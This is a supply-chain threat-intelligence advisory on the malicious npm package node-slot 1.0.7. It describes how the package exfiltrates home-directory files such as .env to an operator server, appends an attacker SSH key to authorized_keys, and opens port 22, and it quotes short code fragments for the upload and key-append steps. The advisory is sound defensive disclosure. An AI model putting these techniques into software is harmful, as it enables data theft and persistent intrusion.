Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in node-slot (npm)

node-slot

Risk score

92

AI summary

Indexed incident for node-slot (npm).

Description

node-slot 1.0.7 contacts https://datasecure-service.vercel.app/api/v1 to retrieve scan and block patterns, then walks the user's home directory (or non-C: drives on Windows) for files matching extensions such as .env, .json, .toml, .pdf and .docx and uploads them via a multipart POST (axios.post(UPLOAD_URL, form, ...) at index.js:78) together with the OS username and platform. On Linux it additionally fetches an attacker-supplied SSH public key from /api/ssh-key, appends it to ~/.ssh/authorized_keys (fs.appendFileSync(authKeys, sshKey + "\n", { mode: 0o600 })), and then runs sudo ufw enable and sudo ufw allow 22/tcp so that the operator can reach the SSH service; the result is persistent remote shell access to the installer's machine. Because the scan and block patterns are served from the operator's server, the harvester can be retargeted without republishing the package. package.json has an empty author and description and lists Node built-in module names (child_process, os) as fake dependencies, a disguise consistent with a deliberately malicious package.

Technical details

Affected versions

= 1.0.7

Indicators

  • affected version = 1.0.7 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents